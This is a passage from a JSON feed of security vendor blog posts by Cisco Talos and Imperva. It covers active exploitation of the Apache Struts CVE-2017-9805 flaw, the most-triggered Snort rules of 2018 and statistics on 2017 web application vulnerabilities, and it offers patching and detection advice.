id=\"h.yv6ldyfuky10\">Mitigation</h3>Apache has released a new version of Struts that resolves this issue. If you believe that you have a potentially vulnerable version of Apache struts there are two options: upgrade to Struts 2.5.13 / Struts 2.3.34 or remove the REST plugin if it's not actively being used. Instructions to achieve this are provided as part of the <a href=\"https://cwiki.apache.org/confluence/display/WW/S2-052\">security bulletin</a> and should be reviewed and tested before applying in a production environment. In the event it's not possible to upgrade or remove the REST plugin, limiting it to server normal pages and JSONs may help limit the risk the compromise.<br /><h3 id=\"h.dp04v9qgtelp\">Conclusion</h3>This is the latest in a long line of vulnerabilities that are exposing servers to potential exploitation. In today's threat landscape a lot of attention is paid to endpoint systems being compromised, and with good reason, as it accounts for the majority of the malicious activity we observe on a daily basis. However, that does not imply that patching of servers should not be an extremely high priority. These types of systems, if compromised, can potentially expose critical data and systems to adversaries.<br /><br />The vulnerability is yet another example of how quickly miscreants will move to take advantage of these types of issues. Within 48 hours of disclosure we were seeing systems activity exploiting the vulnerability. To their credit the researchers disclosed the vulnerability responsibly and a patch was available before disclosure occurred. However, with money at stake bad guys worked quickly to reverse engineer the issue and successfully develop exploit code to take advantage of it. In today's reality you no longer have weeks or months to respond to these type of vulnerabilities, it's now down to days or hours and every minute counts. Ensure you have protections in place or patches applied to help prevent your enterprise from being impacted.<br /><h3 id=\"h.myaej86w3pvi\">Coverage</h3>Talos has released the following Snort rule to address this vulnerability. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href=\"https://snort.org/products\">Snort.org</a>.<br /><br />Snort Rule: 44315<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-U6SRWeSjeTM/WbHJZe1FSrI/AAAAAAAABTs/N-Z3A0kgDZUf0j3-p0b7-PSV7hVX3TZMACLcBGAs/s1600/image1.png\" imageanchor=\"1\" style=\"clear: left; float: left; margin-bottom: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"1341\" data-original-width=\"1600\" height=\"268\" src=\"https://2.bp.blogspot.com/-U6SRWeSjeTM/WbHJZe1FSrI/AAAAAAAABTs/N-Z3A0kgDZUf0j3-p0b7-PSV7hVX3TZMACLcBGAs/s320/image1.png\" width=\"320\" /></a></div><br /><br />Network Security appliances such as <a href=\"https://www.cisco.com/c/en/us/products/security/firewalls/index.html\">NGFW</a>, <a href=\"https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html\">NGIPS</a>, and <a href=\"https://meraki.cisco.com/products/appliances\">Meraki MX</a> can detect malicious activity associated with this threat.<br /><br /><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=nXfzZg_yH_w:t_cz9fDBuvo:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/nXfzZg_yH_w\" height=\"1\" width=\"1\" alt=\"\"/>", "modified": "2017-09-08T15:49:47", "published": "2017-09-07T15:42:00", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/nXfzZg_yH_w/apache-struts-being-exploited.html", "id": "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB", "title": "Another Apache Struts Vulnerability Under Active Exploitation", "type": "talosblog", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-12T15:23:07", "bulletinFamily": "blog", "description": "_This blog post was authored by Benny Ketelslegers of Cisco Talos_ \n_ \n_The cybersecurity field shifted quite a bit in 2018. With the boom of cryptocurrency, we saw a transition from ransomware to [cryptocurrency miners](<https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html>). Talos researchers identified APT campaigns including [VPNFilter](<https://blog.talosintelligence.com/2018/05/VPNFilter.html>), predominantly affecting small business and home office networking equipment, as well as [Olympic Destroyer](<https://blog.talosintelligence.com/2018/02/olympic-destroyer.html>), apparently designed to disrupt the Winter Olympics. \n \nBut these headline-generating attacks were only a small part of the day-to-day protection provided by security systems. In this post, we'll review some of the findings created by investigating the most frequently triggered SNORT\u24c7 rules as reported by [Cisco Meraki](<https://meraki.cisco.com/>) systems. These rules protected our customers from some of the most common attacks that, even though they aren't as widely known, could be just as disruptive as something like Olympic Destroyer. Snort is a free, open-source network intrusion prevention system. Cisco Talos provides new rule updates to Snort every week to protect against software vulnerabilities and the latest malware. \n \n \n\n\n### Top 5 Rules\n\n \nSnort rules trigger on network behavior ranging from attempts to probe networked systems, attempts at exploiting systems, to detecting known malicious command and control traffic. Each rules detects specific network activity, and each rules has a unique identifier. This identifier is comprised of three parts. The Generator ID (GID), the rule ID (SID) and revision number. The GID identifies what part of Snort generates the event. For example, \"1\" indicates an event has been generated from the text rules subsystem. The SID uniquely identifies the rule itself. You can search for information on SIDs via the search tool on the [Snort website](<https://www.snort.org/>). The revision number is the version of the rule. Be sure to use the latest revision of any rule. \n \nSnort rules are classified into different classes based on the type of activity detected with the most commonly reported class type being \"policy-violation\" followed by \"trojan-activity\" and \"attempted-admin.\" Some less frequently reported class types such as \"attempted user\" and \"web-application-attack\" are particularly interesting in the context of detecting malicious inbound and outbound network traffic. \n \nCisco Meraki-managed devices protect clients networks and give us an overview of the wider threat environment. These are the five most triggered rules within policy, in reverse order. \n \n\n\n#### No. 5: 1:43687:2 \"suspicious .top dns query\"\n\n \nThe .top top-level domain extension is a generic top level domain and has been observed in malware campaigns such as the [Angler exploit kit](<https://blog.talosintelligence.com/2016/03/angler-slips-hook.html>) and the [Necurs botnet](<https://blog.talosintelligence.com/2018/01/the-many-tentacles-of-necurs-botnet.html>). This top-level domain can be bought as cheap as 1 USD and is the reason it is very popular with cybercriminals for their malware and phishing campaigns. \n \nThis signature triggers on DNS lookups for .top domains. Such a case doesn\u2019t necessarily mean that such a lookup is malicious in nature, but it can be a useful indicator for suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated as to the cause, especially if a single device is responsible for a large proportion of these triggers. \n \n\n\n#### No. 4: 1:41978:5 \"Microsoft Windows SMB remote code execution attempt\"\n\n \nIn May 2017, a [vulnerability](<https://www.us-cert.gov/ncas/current-activity/2017/03/16/Microsoft-SMBv1-Vulnerability>) in SMBv1 was published that could allow remote attackers to execute arbitrary code via crafted packets. This led to the outbreak of the network worms [Wannacry](<https://blog.talosintelligence.com/2017/05/wannacry.html>) and [Nyetya](<https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html>) in 2017. Although it did not make our top five rules in 2017, it seems there was still a lot scanning or attempts to exploit this vulnerability in 2018. This shows the importance of network defenses and patching management programs as often as possible. \n \nOrganizations should ensure that devices running Windows are fully patched. Additionally, they should have SMB ports 139 and 445 blocked from all externally accessible hosts. \n \n\n\n#### No. 3: 1:39867:4 \"Suspicious .tk dns query\"\n\n \nThe .tk top-level domain is owned by the South Pacific territory of Tokelau. The domain registry allows for the registration of domains without payment, which leads to the .tk top level domain being one of the most prolific in terms of the number of domain names registered. However, this free registration leads to .tk domains frequently being abused by attackers. \n \nThis rule triggers on DNS lookups for .tk domains. Such a case doesn't necessarily mean that such a lookup is malicious in nature, but it can be a useful indicator for suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated as to the cause, especially if a single device is responsible for a large proportion of these triggers. \n \nOther, similar rules detecting DNS lookups to other rarely used top-level domains such as .bit, .pw and .top also made into our list of top 20 most triggered rules. \n \n\n\n#### No. 2: 1:35030:1 &amp; 1:23493:6 \"Win.Trojan.Zeus variant outbound connection\"\n\n \nHistorically, one of the most high-profile pieces of malware is [Zeus/Zbot](<https://talosintelligence.com/zeus_trojan>), a notorious trojan that has been employed by botnet operators around the world to steal banking credentials and other personal data, participate in click-fraud schemes, and likely numerous other criminal enterprises. It is the engine behind notorious botnets such as Kneber, which made headlines worldwide. \n \nIn the beginning of 2018, Talos observed a [Zeus variant](<https://blog.talosintelligence.com/2018/01/cfm-zeus-variant.html>) that was launched using the official website of Ukraine-based accounting software developer Crystal Finance Millennium (CFM). \n \nThis vector is similar to the attack outlined by Talos in the Nyetya and companion MeDoc blog post. Ukrainian authorities and businesses were alerted by local security firm (ISSP) that another accounting software maker had been compromised. CFM's website was being used to distribute malware that was retrieved by malware downloaders attached to messages associated with a concurrent spam campaign. \n \nEver since the source code of Zeus leaked in 2011, we have seen various variants appear such as [Zeus Panda](<https://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html>) which poisoned Google Search results in order to spread. \n \n\n\n#### No. 1: 1:46237:1 \"PUA-OTHER Cryptocurrency Miner outbound connection attempt\" &amp; \"1:45549:4 PUA-OTHER XMRig cryptocurrency mining pool connection attempt\"\n\n \nOver the past year, we have seen a seismic shift in the threat landscape with the explosive growth of malicious cryptocurrency mining. Cisco Talos created various rules throughout the year to combat Cryptocurrency mining threats and this rule deployed in early 2018, proved to be the number 1 showing the magnitude of attacks this rule detected and protected against. This threat has spread across the internet like wildfire and is being delivered through multiple vectors including email, web, and active exploitation. It is no surprise that these two combined rules are the most often observed triggered Snort rule in 2018. \n \nCryptocurrency mining can use up a considerable amount of computing power and energy that would otherwise be incredibly valuable to any organization. \n \nFor an overview of all related snort rules and full details of all the methods and technologies Cisco Talos uses to thwart cryptocurrency mining, download the Talos whitepaper [here](<https://www.talosintelligence.com/resources/59>). \n \n\n\n \n\n\n[](<https://2.bp.blogspot.com/-XcaLfnec00Q/XFsp6eXg_rI/AAAAAAAAACI/fxssE2sbuesqNKpMzg1Lbqnod5iU9u4oQCLcBGAs/s1600/012419-Snort-Sigs-Blog-outbound-connection-attempt.png>)\n\n \n\n\n### INBOUND and OUTBOUND\n\n \nNetwork traffic can cross an IDS from external to internal (inbound), from the internal to external (outbound) interfaces or depending on the architecture of your environment the traffic can avoid being filtered by a firewall or inspected by an IPS/IDS device; this will generally be your local/internal traffic on the same layer2 environment. An alert may be triggered and logged for any of these scenarios depending on the rulesets in place and the configuration of your sensors. \n \n \nOutbound rules were triggered during 2018 much more frequently than internal, which in turn, were more frequent than inbound with ratios of approximately 6.9 to 1. The profile of the alerts are different for each direction. Inbound alerts are likely to detect traffic that can be attributed to attacks on various server-side applications such as web applications or databases. Outbound alerts are more likely to contain detection of outgoing traffic caused by malware infected endpoints. \n \nLooking at these data sets in more detail gives us the following: \n \n\n\n[](<https://4.bp.blogspot.com/-p8YZlzLMQXE/XFsqAliaQcI/AAAAAAAAACM/XhgffiU6hUYdyd21OCDF_QJAEpBKYYn1gCLcBGAs/s1600/012419-Snort-Sigs-Blog-inbound-signature-types.png>)\n\n \nWhile trojan activity was rule type we saw the most of in 2018, making up 42.5 percent of all alerts, we can now see \"Server-Apache\" taking the lead followed by \"OS-Windows\" as a close second. \n \nThe \"Server-Apache\" class type covers Apache related attacks which in this case consisted mainly of 1:41818 and 1:41819 detecting the Jakarta Multipart parser vulnerability in Apache Struts ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). Later in 2017, a second Apache Struts vulnerability was discovered under CVE-2017-9805, making this rule type the most observed one for 2018 IDS alerts. \n \n\"OS-Windows\" class alerts were mainly triggered by Snort rule 1:41978, which covers the SMBv1 vulnerability exploited by [Wannacry](<https://blog.talosintelligence.com/2017/05/wannacry.html>) and [NotPetya](<https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html>) (MS-17-010). \n \nThe \"Browser-plugins\" class type covers attempts to exploit vulnerabilities in browsers that deal with plugins to the browser. (Example: ActiveX). Most activity for 2018 seems to consist of Sid 1:8068 which is amongst others linked to the \"Microsoft Outlook Security Feature Bypass Vulnerability\" (CVE-2017-11774). \n\n\n \n\n\n[](<http://2.bp.blogspot.com/-lKN6ktW9YRg/XF2L_nSsNfI/AAAAAAAAAVw/6G830jVQQA8On0TJLRDs0enzFolMyl-0QCK4BGAYYCw/s1600/012419-Snort-Sigs-Blog-outbound-signature-types.png>)[](<http://1.bp.blogspot.com/-hrZUBsvx4sw/XF2Py-Y-_-I/AAAAAAAAAWI/TU0EcE5KCNwNtIznDY93Bt6Hjn0WCih4QCK4BGAYYCw/s1600/012419-Snort-Sigs-Blog-outbound-signature-types.png>)\n\n \n \nFor outbound connections, we observed a large shift toward the \"PUA-Other\" class, which is mainly a cryptocurrency miner outbound connection attempt. Cryptomining can take up a large amount of valuable enterprise resources in terms of electricity and CPU power. To see how to block Cryptomining in an enterprise using Cisco Security Products, have a look at our [w](<https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html>)[hitepaper](<https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html>) published in July 2018. \n \nThe most frequently triggered rules within the \"Malware-CNC\" rule class are the Zeus trojan activity rules discussed above. \n\n\n### Conclusion\n\n \n\n\nSnort rules detect potentially malicious network activity. Understanding why particular rules are triggered and how they can protect systems is a key part of network security. Snort rules can detect and block attempts at exploiting vulnerable systems, indicate when a system is under attack, when a system has been compromised, and help keep users safe from interacting with malicious systems. They can also be used to detect reconnaissance and pre-exploitation activity, indicating that an attacker is attempting to identify weaknesses in an organization's security posture. These can be used to indicate when an organization should be in a heightened state of awareness about the activity occurring within their environment and more suspicious of security alerts being generated. \n \nAs the threat environment changes, it is necessary to ensure that the correct rules are in place protecting systems. Usually, this means ensuring that the most recent rule set has been promptly downloaded and installed. As shown in the Apache Struts vulnerability data, the time between a vulnerability being discovered and exploited may be short. \n \nOur most commonly triggered rule in 2018: 1:46237:1 \"PUA-OTHER Cryptocurrency Miner outbound connection attempt\" highlights the necessity of protecting IoT devices from attack. Malware such as Mirai seeks to compromise these systems to use them as part of a botnet to put to use for further malicious behaviour. Network architectures need to take these attacks into consideration and ensure that all networked devices no matter how small are protected. \n \nSecurity teams need to understand their network architectures and understand the significance of rules triggering in their environment. For full understanding of the meaning of triggered detections it is important for the rules to be open source. Knowing what network content caused a rule to trigger tells you about your network and allows you to keep abreast of the threat environment as well as the available protection. \n \nAt Talos, we are proud to maintain a set of open source Snort rules and support the thriving community of researchers contributing to Snort and helping to keep networks secure against attack. We're also proud to contribute to the training and education of network engineers through the Cisco Networking Academy, as well through the release of additional open-source tools and the detailing of attacks on our blog. \n \nYou can [subscribe](<https://www.snort.org/products>) to Talos' newest rule detection functionality for as low as $29 a year with a personal account. Be sure and see our business pricing for Snort as well [here](<https://snort.org/products%23rule_subscriptions>).", "modified": "2019-02-12T14:15:53", "published": "2019-02-06T08:19:00", "id": "TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/6rupY-noy3s/2018-in-snort-signatures.html", "type": "talosblog", "title": "2018 in Snort Rules", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "impervablog": [{"lastseen": "2017-12-28T17:52:36", "bulletinFamily": "blog", "description": "As a web application firewall provider, part of our job at Imperva is constantly monitoring new security vulnerabilities. To do this, we use internal software that collects information from various data sources such as vulnerability databases, newsletters, forums, social media and more, integrate it into a single repository, and assess each vulnerability\u2019s priority. Having this kind of data puts us in a unique position to provide analysis of all web application vulnerabilities throughout the year, view trends and notice significant changes in the security landscape.\n\nAs we did [last year](<https://www.imperva.com/blog/2016/12/state-web-applications-vulnerabilities-2016/>), before we enter 2018, we took a look back at 2017 to understand the changes and trends in web application security over the past year.\n\nThis year we registered a record high number of web application vulnerabilities including well-known categories like [cross-site scripting](<https://www.imperva.com/app-security/threatglossary/cross-site-scripting-xss/>), but also new categories such as insecure [deserialization](<https://www.owasp.org/index.php/Deserialization_Cheat_Sheet>). In addition, the number of internet of things (IoT) vulnerabilities continued to grow and severely impact the security landscape. WordPress and PHP each continued to \u201cdominate\u201d in terms of vulnerabilities published in the content management system and server side technologies respectively. [Apache Struts vulnerabilities](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>), although the framework is less popular in the market at large, had a huge effect and were claimed to be the root cause of one of the biggest security breaches in 2017.\n\n## 2017 Web Application Vulnerabilities Statistics\n\nOne of the first stats we review is quantity, meaning how many vulnerabilities were published in 2017 and how that number compares to previous years.\n\nFigure 1 shows the number of vulnerabilities on a monthly basis over the last two years. We can see that the overall number of new vulnerabilities in 2017 (14,082) increased significantly (212%) compared to 2016 (6,615). According to our data, more than 50% of web application vulnerabilities have a public exploit available to hackers. In addition, more than a third (36%) of web application vulnerabilities don\u2019t have an available solution, such as a software upgrade workaround or software patch.\n\nAs usual, cross-site scripting (Figure 2) vulnerabilities are the majority (8%) of 2017 web application vulnerabilities. In fact, their amount has doubled since 2016.\n\n_Figure 1: Number of web application vulnerabilities in 2016-2017_\n\n## OWASP Top 10 View\n\nThis year [OWASP released](<https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf>) their long awaited \u201cTop 10\u201d list, which included two new risks:\n\n### Insecure Deserialization\n\nSerialization is the process of translating data structures or object state into a format that can be stored (for example, in a file or memory buffer) or transmitted (for example, across a network connection link) and reconstructed later (deserialization). Serialization is widely used in RPC, HTTP, databases, etc.\n\nApplications and APIs may be vulnerable if they deserialize hostile or tampered objects supplied by an attacker without proper sanitization. Therefore, we thought it would be interesting to view the security vulnerabilities in light of these changes.\n\n_Figure 2: Number and type of OWASP Top 10 vulnerabilities 2014-2017_\n\nThe amount of deserialization vulnerabilities from 2016-2017 (Figure 2) increased substantially from previous years which may explain how they \u201cearned\u201d their spot in the new OWASP Top 10 list. Today, more and more applications and frameworks are using standard APIs to communicate. Some of these APIs take serialized objects and deserialize them in return, which can explain the growing trend of insecure deserialization vulnerabilities.\n\n### Insufficient Logging and Monitoring\n\nAttackers rely on the lack of monitoring and timely response to achieve their goals without being detected. We have not found any vulnerabilities published in 2017 that are directly related to this category. It will be interesting to monitor it and see if that will change next year.\n\n## The Rise of the (IoT) Machines\n\nNowadays nearly every aspect of our lives is connected to the internet and we can find smart devices everywhere\u2014in our home refrigerator, TV, lights, doors, locks and even the clothes we wear. These devices are designed to send and receive information and thus are usually connected to the internet at all times. In many cases the vendors of smart devices neglect to secure them properly or even \u201cbackdoor\u201d them on purpose in order to gain hidden access.\n\n \n_Figure 3: IoT vulnerabilities 2014-2017_\n\n2017 registered a record high of 104 IoT-related vulnerabilities (Figure 3), a huge increase relative to previous years. The rising trend in the amount of vulnerabilities can be associated with their increasing popularity in our modern lives and advances in IoT technology that make IoT devices cheaper and accessible to more people.\n\nOne of the most popular vulnerability types in IoT devices (35%) is using default or easy to guess credentials in order to gain access to the device and take control of it. Once the device is controlled by the attacker it can be used to mount any kind of attack. Earlier this year the well-known [Mirai malware used this kind of vulnerability](<https://www.incapsula.com/blog/malware-analysis-mirai-ddos-botnet.html>) (default credentials) to spread itself through the network. Once the malware gained access to the device, it turned it into a remote-controlled bot that was used as part of huge a DDoS attack.\n\n## Content Management Systems\n\nWhen analyzing content management system (CMS) frameworks, we decided to concentrate on the four leading platforms that account for [60% of the market share](<https://w3techs.com/technologies/overview/content_management/all>)\u2014WordPress, Joomla, Drupal and Magento.\n\n_Figure 4: Number of vulnerabilities by CMS platform 2016-2017_\n\n### WordPress\n\nAs suspected, WordPress vulnerabilities continue to be the lion\u2019s share of all CMS-related vulnerabilities. In fact, WordPress vulnerabilities (418) have increased by ~400% since 2016 (Figure 4).\n\nFurther analysis of WordPress vulnerabilities showed that 75% of the 2017 vulnerabilities originated from third-party vendor plug-ins (Figure 5).\n\n_Figure 5: WordPress third party vendor vulnerabilities in 2017_\n\nThe rise in the number of vulnerabilities can be explained by the growth of WordPress (Figure 6) and because [third party plug-in](<https://www.wpwhitesecurity.com/wordpress-security/statistics-highlight-main-source-wordpress-vulnerabilities/>) code is notoriously known for its bad security.\n\n**Year** | **Number of WordPress Plug-ins** \n---|--- \n**2015** | 41,347 \n**2016** | 48,044 \n**2017** | 53,357 \n \n_Figure 6: WordPress plug-in's trend_\n\n## Server-side Technologies\n\nPHP is still the most prevalent server-side language, therefore it\u2019s expected be associated with the highest number of vulnerabilities. In 2017, 44 vulnerabilities in PHP were published (Figure 7) which is a significant decrease (-143%) from the number of PHP vulnerabilities in 2016 (107) (see Figure 7). At the end of 2015, PHP released a major version, 7.0, after almost a year and half with no updates, which can explain the growth in the number of vulnerabilities in 2016. Last year PHP released a minor version, 7.1 (December 2016), with slight changes which can explain the decrease in the number of vulnerabilities in 2017.\n\n_Figure 7: Top server-side technology vulnerabilities 2014-2017_\n\n## The Year of Apache Struts\n\nAlthough 2017 listed fewer vulnerabilities in the Apache Struts framework (Figure 8), their impact was huge as some of them included unauthenticated [remote code execution](<https://www.imperva.com/blog/2017/01/remote-code-execution-rce-attacks-apache-struts/>) (RCE) which basically means that anyone can hack and take over the server, access private information and more.\n\n_Figure 8: Apache Struts and remote code execution vulnerabilities in 2014-2017_\n\nWe have previously blogged about this [specific vulnerability](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) and [multiple other Apache Struts](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>) vulnerabilities in detail. They\u2019re worth checking out if you haven\u2019t already.\n\n## Predictions Toward 2018\n\nAs a security vendor, we\u2019re often asked about our predictions. Here are a couple of possible vulnerabilities trends for 2018:\n\n * Cross-site scripting vulnerabilities will continue to lead mainly because of the rise of [cryptojacking](<https://www.wired.com/story/cryptojacking-cryptocurrency-mining-browser/>) and the increasing popularity of server-side technologies that utilize JavaScript (e.g., Node.JS).\n * More authentication-related vulnerabilities from the family of \u201cdefault/guessable credentials\u201d will be discovered (especially in IoT devices) and exploited in order to herd new botnets. These botnets can be used to mount any kind of large scale attacks\u2014DDoS, brute force and more.\n\n## How to Protect Your Apps and Data\n\nOne of the best solutions for protecting against web application vulnerabilities is to deploy a [web application firewall](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>) (WAF). A WAF may be either on-premises, in the cloud or [a combination of both](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>) depending on your needs and infrastructure.\n\nAs organizations are moving more of their apps and data to the cloud, it\u2019s important to think through your security [requirements](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>). A solution supported by a dedicated security team is an important requirement to add to your selection criteria. Dedicated security teams are able to push timely security updates to a WAF in order to properly defend your assets.", "modified": "2017-12-28T17:20:47", "published": "2017-12-28T17:20:47", "id": "IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "href": "https://www.imperva.com/blog/2017/12/the-state-of-web-application-vulnerabilities-in-2017/", "type": "impervablog", "title": "The State of Web Application Vulnerabilities in 2017", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-09T07:20:50", "bulletinFamily": "blog", "description": "Just two months ago we [published an analysis](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>) of a critical remote code execution (RCE) security vulnerability in Apache Struts. Now Apache Struts has published a new version fixing yet another critical RCE vulnerability (September 5, 2017).\n\n[CVE-2017-9805](<http://struts.apache.org/docs/s2-052.html>) is a vulnerability in Apache Struts related to using the Struts REST plugin with XStream handler to handle XML payloads. If exploited it allows a remote unauthenticated attacker to run malicious code on the application server to either take over the machine or launch further attacks from it.\n\n## Imperva Customers Protected\n\nIn addition to our zero-day protection rules that spotted this attack, we\u2019ve also published new dedicated security rules to provide maximum protection to Imperva SecureSphere and Incapsula WAF customers against this vulnerability. As of the publication date of this post, our systems have successfully blocked thousands of attacks from all over the world (see \"In the Wild\" section below).\n\n## Multiple Apache Struts Vulnerabilities in 2017\n\nAs mentioned above, this isn\u2019t the first time such a critical vulnerability has been found in Apache Struts. In fact, we\u2019ve seen an increasing amount of them in the Struts platform as several other RCE vulnerabilities have already been discovered since the beginning of 2017. The CVEs are summarized below.\n\n**Date** | **CVSS** | **Vulnerability** | **CVE** \n---|---|---|--- \n9/7/2017 | 9.3 | Apache Struts views/freemarker/FreemarkerManager.java Freemarker Tag Handling Remote Code Execution | 2017-12611 \n9/5/2017 | 10 | Apache Struts REST Plugin XStream XML Request Deserialization Remote Code Execution | 2017-9805 \n7/11/2017 | 5 | Apache Struts URL Validator Regular Expression URL Handling Remote DoS | 2017-7672, 2017-9804 \n7/11/2017 | 6.8 | Apache Struts Spring AOP Functionality Unspecified Remote DoS | 2017-9787 \n7/7/2017 | 10 | Apache Struts 1 Plugin for Struts 2 ActionMessage Class Error Message Input Handling Remote Code Execution | 2017-9791 \n3/6/2017 | 10 | Apache Struts Jakarta Multipart Parser File Upload Multiple Content Value Handling Remote Code Execution (Struts-Shock) | 2017-5638 \n \n## About the CVE-2017-9805 Vulnerability\n\nApache Struts contains a flaw in the REST Plugin XStream that is triggered as the program insecurely deserializes user-supplied input in XML requests. More specifically, the problem occurs in XStreamHandler\u2019s toObject () method, which does not impose any restrictions on the incoming value when using XStream deserialization into an object, resulting in arbitrary code execution vulnerabilities. More information about the vulnerability can be found [here](<https://lgtm.com/blog/apache_struts_CVE-2017-9805>).\n\n## In the Wild\n\nTo date, our systems have successfully blocked thousands of attacks from all over the world with China, as usual in Apache Struts vulnerabilities, identified as the most prominent source of attacks (see Figure 1).\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2017/09/Distribution-of-CVE-2017-9805-attacks-WW-1-2.png>)\n\n_Figure 1: Geo-distribution of CVE-2017-9805 attacks_\n\nIt is interesting to note that a single Chinese IP is responsible for more than 40% of the attack attempts that we registered. According to [Shodan](<https://www.shodan.io/>), this IP is registered to a large Chinese e-commerce company and runs an open SSH server which may indicate that this is a compromised machine. This machine tried to attack dozens of sites with different automated tools impersonating legitimate browsers such as cURL, wget, and Python-requests indicating the persistency of the attacker(s). [Unlike past vulnerabilities](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>), most of the attempted attacks (~80%) refer to exploitation attempts and only 20% refer to reconnaissance attempts to track vulnerable servers (see Figure 2). Exploitation attempts involved running operating systems such as shell, wget, or cURL in order to download malicious payload and take over the server to mount further attacks, usually [DDoS](<https://www.imperva.com/app-security/threatglossary/ddos-attacks/>), as part of a larger botnet.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2017/09/CVE-2017-9805-payload-by-percentage-2.jpg>)\n\n_Figure 2: Percentage of payload types of CVE-2017-9805 attack attempts_\n\n## Stay Protected with Virtual Patching\n\nBased on the official [advisory](<http://struts.apache.org/docs/s2-052.html>), this vulnerability affects applications using Struts 2.5 (Struts 2.5.12). There is no known workaround, meaning that an update is required for those who use these versions. It is also mentioned that backward compatibility is not ensured and that some REST actions stop working.\n\nAn immediate security measure organizations can use to protect against these types of vulnerabilities is virtual patching. Instead of leaving a web application exposed to attack while attempting to modify the code after discovering a vulnerability, virtual patching actively protects web apps from attacks, reducing the window of exposure and decreasing the cost of emergency fix cycles until you\u2019re able to patch them.\n\nLearn more about virtual patching and protecting web applications from vulnerabilities using [Imperva Incapsula WAF](<https://www.incapsula.com/website-security/web-application-firewall.html>) or [Imperva SecureSphere WAF](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>).", "modified": "2017-09-08T16:10:08", "published": "2017-09-08T16:10:08", "id": "IMPERVABLOG:D4ED0576717DBEEDCF6B9B98BADC92BD", "href": "https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/", "title": "CVE-2017-9805: Analysis of Apache Struts RCE Vulnerability in REST Plugin", "type": "impervablog", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-25T19:52:24", "bulletinFamily": "blog", "description": "I recently took a step back to review all the content we shared in 2017 on the Imperva blog. We covered a broad range of topics including data security, cloud migration, application and API security, AI and machine learning, cybersecurity research, GDPR, insider threats and more. We were busy! Cybersecurity certainly held the world's attention in 2017.\n\nSeveral stories rose to the top as either most read by you, particularly relevant to today's cybersecurity industry or exceptionally newsworthy (and in some cases, all of the above). For an end-of-year reading shortlist, I've compiled our top 10 blog posts from 2017.\n\n## 1\\. What\u2019s Next for Ransomware: Data Corruption, Exfiltration and Disruption\n\nThe WannaCry ransomware attack caught everyone off guard, infecting more than 230,000 computers in 150 countries by encrypting data on networked machines and demanding payments in Bitcoin. We wrote about how to [protect against it](<https://www.imperva.com/blog/2017/05/protect-against-wannacry-with-deception-based-ransomware-detection/>), but our post on [what's next for ransomware](<https://www.imperva.com/blog/2017/05/whats-next-for-ransomware/>) garnered even more attention\u2014it was our most read post of the year.\n\n## 2\\. CVE-2017-5638: Remote Code Execution (RCE) Vulnerability in Apache Struts\n\nApache Struts made headlines all over the place in 2017. The [vulnerability we wrote about in March](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) hit it big and just kept on going. You might remember it reared its ugly head later in the year when it was tied to the Equifax breach. (We also wrote about two other Apache Struts vulnerabilities: [CVE-2017-9791](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>) and [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>).)\n\n## 3\\. Top Insider Threat Concern? Careless Users. [Survey]\n\nWe [surveyed 310 IT security 